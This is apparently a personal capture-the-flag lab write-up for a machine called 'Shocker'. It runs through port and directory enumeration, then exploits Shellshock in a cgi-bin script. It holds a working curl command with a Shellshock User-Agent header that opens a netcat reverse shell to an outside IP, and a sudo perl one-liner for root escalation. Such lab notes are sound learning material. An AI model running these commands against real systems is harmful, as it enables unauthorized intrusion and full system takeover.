Shocker

Process

Nmap revealed:

80 apache
2222 ssh

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

And dirb showed:

403  ".htpasswd"                                                                                                    
403  ".hta"                                                                                                         
403  ".htaccess"                                                                                                   
403  "cgi-bin/"                                                                                                     
200  "index.html"                                                                                                   
403  "server-status"   

• scanned for vuln in searchsploit but got nothing

• all dirb enum returned dont know how to proceed and checked writeup

• did some research on cgi-bin and its history background

  • may contain cgi scripts

• search with dirb http://$IP/cgi-bin -X .sh,.cgi,.pl -t -o dirb.txt

• found user.sh

• did research on [[CGI and Shellshock]]

set up reverse shell with curl -H "user-agent:(){:;};echo;/bin/sh -c 'nc 10.10.14.5 4444 -e /bin/bash'" $URL:

Got non-tty shell; Flag in ~/user.txt

Privilege Escalation

Perl can be run as root without password: sudo /usr/bin/perl -e “exec("/bin/bash")”

Pwned!

Takeaway

1. even nmap showing 403, file inside folder can still be accessed, e.g. script in cgi-bin

2. cgi-bin folder may contain script which can be vulnerable to shellshock

3. learn about [[CGI and Shellshock]]